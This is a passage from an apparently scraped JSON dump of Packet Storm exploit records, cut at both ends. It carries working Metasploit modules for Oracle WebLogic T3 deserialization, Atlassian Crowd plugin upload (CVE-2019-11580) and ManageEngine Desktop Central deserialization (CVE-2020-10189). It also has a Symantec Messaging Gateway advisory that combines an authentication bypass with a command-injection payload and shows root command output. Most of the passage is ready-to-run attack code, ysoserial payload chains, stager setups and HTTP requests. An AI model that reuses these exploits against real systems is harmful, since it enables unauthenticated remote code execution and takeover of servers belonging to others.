\ndata << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion \ndata << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String; \ndata << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes \ndata << '740002' # TC_STRING (2 bytes) \ndata << '5b42' # VALUE = 0x5b42 = [B \ndata << '78' # block footer \ndata << '720024' # class header \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo \ndata << '6e616c2e5061636b616765496e666f' # (continued) \ndata << 'e6f723e7b8ae1ec9' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0008' # fieldCount = 8 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '4c0009696d706c5469746c65' # 5: Obj: implTitle \ndata << '71' # TC_REFERENCE \ndata << '007e0005' # Handle = 0x007e0005 \ndata << '4c000a696d706c56656e646f72' # 6: Obj: implVendor \ndata << '71' # TC_REFERENCE \ndata << '007e0005' # Handle = 0x007e0005 \ndata << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion \ndata << '71' # TC_REFERENCE \ndata << '007e0005' # Handle = 0x007e0005 \ndata << '78' # class footer \ndata << '707702000078' # block footers \n \ndata << 'fe00ff' # this cruft again. some kind of footer \n \ndata << 'fe010000' # ----- separator ----- \n \n# weblogic.rjvm.JVMID object \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '720013' # class header \ndata << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID' \ndata << 'dc49c23ede121e2a' # serialVersionUID \ndata << '0c' # EXTERNALIZABLE | BLOCKDATA \ndata << '0000' # fieldCount = 0 (!!!) \ndata << '78' # block footer \ndata << '70' # NULL \ndata << '7750' # block header (80 bytes) \ndata << '21' # ! \ndata << '000000000000000000' # 9 NULL BYTES \n \ndata << '0d' # strLength = 13 bytes \n#data << '3139322e3136382e312e323237' # original PoC string = 192.168.1.227 \ndata << '3030302e3030302e3030302e30' # new string = 000.000.000.0 \n# (must be an IP, and length isn't trivially editable) \ndata << '00' # \\0 \n \ndata << '12' # strLength = 18 bytes \n#data << '57494e2d4147444d565155423154362e6568' # original str = WIN-AGDMVQUB1T6.eh \ndata << rand_text_alphanumeric(18).unpack('H*')[0] \n \ndata << '83348cd6' # original = ??? UNKNOWN ??? (Note: Cannot be randomized) \n \ndata << '000000070000' # ??? UNKNOWN ??? \ndata << rport.to_s(16).rjust(4, '0') # callback port \ndata << 'ffffffffffffffffffffffffffffffffffffff' # ??? UNKNOWN ??? \ndata << 'ffffffffff' # ??? UNKNOWN ??? \ndata << '78' # block footer \n \ndata << 'fe010000' # ----- separator ----- \n \n# weblogic.rjvm.JVMID object \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '72' # class \ndata << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID \ndata << 'dc49c23ede121e2a' # serialVersionUID \ndata << '0c' # EXTERNALIZABLE | BLOCKDATA \ndata << '0000' # fieldCount = 0 \ndata << '78' # end block \ndata << '70' # TC_NULL \ndata << '77' # block header \ndata << '20' # length = 32 bytes \ndata << '0114dc42bd071a772700' # old string = ??? UNKNOWN ??? \n#data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZAITON BREAKS THINGS) \n \ndata << '0d' # string length = 13 bytes (NOTE: do not edit) \n#data << '3234322e3231342e312e323534' # original string = 242.214.1.254 \ndata << '3030302e3030302e3030302e30' # new string = 000.000.000.0 \n# (must be an IP, and length isn't trivially editable) \n \n#data << '61863d1d' # original string = ??? UNKNOWN ??? \ndata << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized \n \ndata << '00000000' # NULL BYTES \ndata << '78' # block footer \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef send_payload_objdata \n# payload creation \nif target.name == 'Windows' \nmycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) \nelsif target.name == 'Unix' || target.name == 'Solaris' \nmycmd = payload.encoded \nend \n \n# basic weblogic ClassTableEntry object (serialized) \n# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT? \npayload = '056508000000010000001b0000005d0101007372017870737202787000000000' \npayload << '00000000757203787000000000787400087765626c6f67696375720478700000' \npayload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306' \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '72' # class header \npayload << '00025b42' # Name: 0x5b42 \npayload << 'acf317f8060854e0' # serialVersionUID \npayload << '02' # SERIALIZABLE \npayload << '0000' # fieldCount = 0 \npayload << '7870' # class footer \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '72' # class header \n \npayload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object; \npayload << '6563743b' # (cont) \npayload << '90ce589f1073296c' # serialVersionUID \npayload << '02' # SERIALIZABLE \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \n \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # SERIALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # block footer \npayload << '72' # class header \npayload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector \npayload << 'd9977d5b803baf01' # serialVersionUID \npayload << '03' # WRITE_METHOD | SERIALIZABLE \npayload << '0003' # fieldCount = 3 \npayload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement \npayload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount \npayload << '5b000b656c656d656e7444617461' # 2: Array: elementData \npayload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object; \npayload << '743b' # (cont) \npayload << '7870' # remaining object header \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \nysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload(\"CommonsCollections1\",mycmd) \npayload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join \n \npayload << 'fe010000' # ----- separator ----- \n \n# basic weblogic ImmutableServiceContext object (serialized) \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext \npayload << '7461626c6553657276696365436f6e74657874' # (cont) \npayload << 'ddcba8706386f0ba' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '78' # object footer \npayload << '72' # block header \npayload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext \npayload << '696465722e426173696353657276696365436f' # (cont) \npayload << '6e74657874' # (cont) \npayload << 'e4632236c5d4a71e' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # block footer \npayload << '77' # block header \npayload << '020600' # contents = 0x0600 \npayload << '7372' # class descriptor \npayload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor \npayload << '726e616c2e4d6574686f644465736372697074' # (cont) \npayload << '6f72' # (cont) \npayload << '12485a828af7f67b' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # class footer \npayload << '77' # class data \n \n#payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765 \n#payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c \n#payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b \npayload << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized \npayload << '78' # class footer \npayload << '78' # block footer \n# MISSING OBJECT FOOTER (0x78) \n \npayload << 'fe00ff' # this cruft again. some kind of footer \n \n# sets the length of the stream \ndata = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0') \ndata << payload \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \n \nend \n \ndef exploit \nconnect \n \nprint_status('Sending handshake...') \nt3_handshake \n \nprint_status('Sending T3 request object...') \nbuild_t3_request_object \n \nprint_status('Sending client object payload...') \nsend_payload_objdata \n \nhandler \ndisconnect \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152268/weblogic_deserialize_rawobject.rb.txt"}, {"lastseen": "2021-08-12T16:10:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "packetstorm", "title": "Atlassian Crowd pdkinstall Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2021-08-12T00:00:00", "id": "PACKETSTORM:163810", "href": "https://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE', \n'Description' => %q{ \nThis module can be used to upload a plugin on Atlassian Cloud via \nthe pdkinstall development plugin as an unauthenticated attacker. \nThe payload is uploaded as a JAR archive containing a servlet using \na POST request to /crowd/admin/uploadplugin.action. The check command will \ncheck that the /crowd/admin/uploadplugin.action page exists and that it \nresponds appropriately to determine if the target is vulnerable or not. \n}, \n'Author' => [ \n'Paul', # Vulnerability discovery \n'Corben Leo', # PoC and Vulnerability Writeup. @hacker_ on Twitter. \n'Grant Willcox' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2019-11580'], \n['URL', 'https://jira.atlassian.com/browse/CWD-5388'], \n['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'], \n['URL', 'https://www.corben.io/atlassian-crowd-rce/'] \n], \n'Platform' => %w[java], \n'Arch' => ARCH_JAVA, \n'DefaultOptions' => { \n'HttpClientTimeout' => 25 # Allow a bit more time for the file upload to complete, just in case things are delayed, before timing out. \n}, \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ] \n}, \n'Targets' => \n[ \n[ \n'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n] \n], \n'DisclosureDate' => '2019-05-22' \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8095), \nOptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/']), \n \n] \n) \nend \n \ndef upload_plugin(content) \ndata = Rex::MIME::Message.new \ndata.add_part(content, nil, 'binary', \"form-data; name=\\\"file_#{Rex::Text.rand_text_alpha(8..12)}\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(8..12)}.jar\\\"\") \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'), \n'method' => 'POST', \n'data' => data.to_s, \n'ctype' => \"multipart/mixed; boundary=#{data.bound}\" \n}, datastore['HttpClientTimeout']) \nend \n \ndef generate_plugin_jar \nname = Rex::Text.rand_text_alpha(8..12) \nservlet_name = Rex::Text.rand_text_alpha(8..12) \natlassian_plugin_xml = %( \n<atlassian-plugin key=\"metasploit.PayloadServlet\" name=\"#{name}\" plugins-version=\"2\" class=\"metasploit.PayloadServlet\"> \n<plugin-info> \n<param name=\"atlassian-data-center-compatible\">true</param> \n<description></description> \n<version>1.0.0</version> \n</plugin-info> \n \n<servlet name=\"#{servlet_name}\" key=\"#{servlet_name}\" class=\"metasploit.PayloadServlet\"> \n<url-pattern>/#{name}</url-pattern> \n<description>#{Faker::App.name}</description> \n</servlet> \n</atlassian-plugin> \n) \n \n# Generates .jar file for upload \nzip = payload.encoded_jar \nzip.add_file('atlassian-plugin.xml', atlassian_plugin_xml) \n \nservlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class') \nzip.add_file('/metasploit/PayloadServlet.class', servlet) \n \ncontents = zip.pack \n[contents, name] \nend \n \ndef check \nprint_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...') \nres = upload_plugin(Rex::Text.rand_text_alpha(45..120)) \nif res.nil? \nCheckCode::Unknown('Was not able to connect to the target!') \nelsif (res.body =~ /Unable to install plugin/) && (res.code == 400) \nCheckCode::Vulnerable(\"Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!\") \nelse \nCheckCode::Safe(\"Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!\") \nend \nend \n \ndef exploit \nprint_status('Generating a malicious JAR plugin...') \ncontent, plugin_name = generate_plugin_jar \nprint_status('Uploading the malicious JAR plugin...') \nupload_plugin(content) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, \"/plugins/servlet/#{plugin_name}\"), \n'method' => 'GET' \n}, datastore['HttpClientTimeout']) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163810/atlassian_crowd_pdkinstall_plugin_upload_rce.rb.txt"}, {"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 on January 20, 2020. In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? \n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt"}, {"lastseen": "2017-08-22T15:20:25", "description": "", "cvss3": {}, "published": "2017-08-18T00:00:00", "type": "packetstorm", "title": "Symantec Messaging Gateway 10.6.3-2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6327"], "modified": "2017-08-18T00:00:00", "id": "PACKETSTORM:143821", "href": "https://packetstormsecurity.com/files/143821/Symantec-Messaging-Gateway-10.6.3-2-Remote-Code-Execution.html", "sourceData": "`Hello, \n \nThis is an advisory for CVE-2017-6327 which is an unauthenticated remote \ncode execution flaw in the web interface of Symantec Messaging Gateway \nprior to and including version 10.6.3-2, which can be used to execute \ncommands as root. \n \nSymantec Messaging Gateway, formerly known as Brightmail, is a linux-based \nanti-spam/security product for e-mail servers. It is deployed as a physical \ndevice or with ESX in close proximity to the servers it is designed to \nprotect. \n \n=*=*=*=*=*=*=*=*= TIMELINE \n \n2017-07-07: Reported to Symantec \n2017-08-10: Patch and notice released by Symantec [1] \n2017-08-18: Public technical advisory \n \n=*=*=*=*=*=*=*=*= DESCRIPTION \n \n- Bug #1: Web authentication bypass \n \nThe web management interface is available via HTTPS, and you can't do much \nwithout logging in. \n \nIf the current session (identified by the `JSESSIONID` cookie) has the \n`user` attribute set, the session is considered authenticated. \n \nThe file LoginAction.class defines a number of public methods and they can \nall be reached via unauthenticated web requests. \n \nBy making a GET request to `/brightmail/action1.do?method=method_name` we \ncan execute `LoginAction.method_name` if `method_name` is a public method. \n \nOne such public method which will be the target of our authentication \nbypass is called `LoginAction.notificationLogin`. \n \nIt does the following: \n \n1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt` \n2. Creates a new `UserTO` object using the decrypted `notify` parameter as \nan email value \n3. Creates a new session, invalidating the old one if necessary \n4. Sets the `user` attribute of the newly created session to our \nconstructed UserTO object \n \nIt essentially takes a username value from a GET parameter and logs you in \nas this user if it exists. If not, it creates this user for you. \n \nWe need to encrypt our `notify` argument so that \n`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the \nencryption is just PBEWithMD5AndDES using a static password, conveniently \nincluded in the code itself. I won't include the encryption password or a \nfully encrypted notify string in this post. \n \n \nExample request: \n \nGET \n/brightmail/action1.do?method=notificationLogin&notify=MTIzNDU2Nzg%3d6[...]&id=test \nHTTP/1.1 \n... \n \n \nHTTP/1.1 302 Found \nServer: Apache-Coyote/1.1 \n... \nSet-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail; \nSecure; HttpOnly \n \n \n- Bug #2: Command injection \n \nThe RestoreAction.performRestore method can be reached with an \nauthenticated session and it takes the restoreSource and \nlocalBackupFilename parameters. \n \nAfter a long chain of function calls, localBackupFilename ends up being \nsent to the local \"bmagent\" daemon listening on port 41002. It will execute \n/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied \nvalue. \n \nThe db-restore script is a sudo wrapper for \n/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl \nscript containing a command injection in a call to /usr/bin/du. \n \n$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;\"`id`\";' \n/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory \nsh: uid=0(root) gid=0(root) groups=0(root): command not found \nERROR: Failed to copy 'asdf;\"`id`\";' from local backup store: No such file \nor directory \n \n \nThis command injection can be exploited from the web management interface \nwith a valid session, which we can create using bug #1. \n \n- Combining bug #1 and #2 \n \nThe last step is to get a CSRF token since the vulnerable performRestore \nfunction is annotated with @CSRF. \n \nAfter some quick digging it turns out that all you need to do is call \n/brightmail/common.jsp to get a token that will be valid for all your \nrequests. \n \nThe URL-encoded value we provide for the `localBackupFileSelection` \nparameter is: \nasdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname \n-a>>/data/bcc/webapps/brightmail/output.txt`hehehe \n \nRequest: \n \nGET \n/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65 \nHTTP/1.1 \nHost: 192.168.205.220 \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) \nGecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate, br \nCookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \nResponse: \n \nHTTP/1.1 200 OK \nServer: Apache-Coyote/1.1 \nCache-Control: no-store,no-cache \nPragma: no-cache \nExpires: Thu, 01 Jan 1970 00:00:00 GMT \nX-Frame-Options: SAMEORIGIN \nContent-Type: text/html;charset=UTF-8 \nContent-Length: 803 \nDate: Thu, 29 Jun 2017 06:48:12 GMT \nConnection: close \n \n<HTML> \n<title>Symantec Messaging Gateway - Restore</title> \n... \n \n \nNow to confirm that our command output was correctly placed in a file \ninside the webroot. \n \nimac:~% curl -k https://192.168.205.220/brightmail/output.txt \nuid=0(root) gid=0(root) groups=0(root) \nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 \n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \n \n \n=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT \n \nimac:~/brightmail% python brightmail-rce.py \nhttps://192.168.205.220/brightmail \nbypassing login.. \n* JSESSIONID=693079639299816F80016123BE8A0167 \nverifying login bypass.. \n* Version: 10.6.3 \ngetting csrf token.. \n* 1e35af8c567d3448a65c8516a835cec30b6b8b73 \ndone, verifying.. \n \nuid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root) \ngroups=0(root),99(nobody),499(mysql),502(bcc) \nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 \n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \n \n \n# cat /etc/issue \n \nSymantec Messaging Gateway \nVersion 10.6.3-2 \nCopyright (c) 1998-2017 Symantec Corporation. All rights reserved. \n \n \n=*=*=*=*=*=*=*=*= REFERENCES \n \n[1] \nhttps://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00 \n \n=*=*=*=*=*=*=*=*= CREDIT \n \nPhilip Pettersson \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/143821/symantecmg-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-29T22:20:57", "description": "", "cvss3": {}, "published": "2017-09-29T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic Server Java Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2017-09-29T00:00:00", "id": "PACKETSTORM:144405", "href": "https://packetstormsecurity.com/files/144405/Oracle-WebLogic-Server-Java-Deserialization-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution] \n# Date: [27/09/2017] \n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot \n# Vulnerability 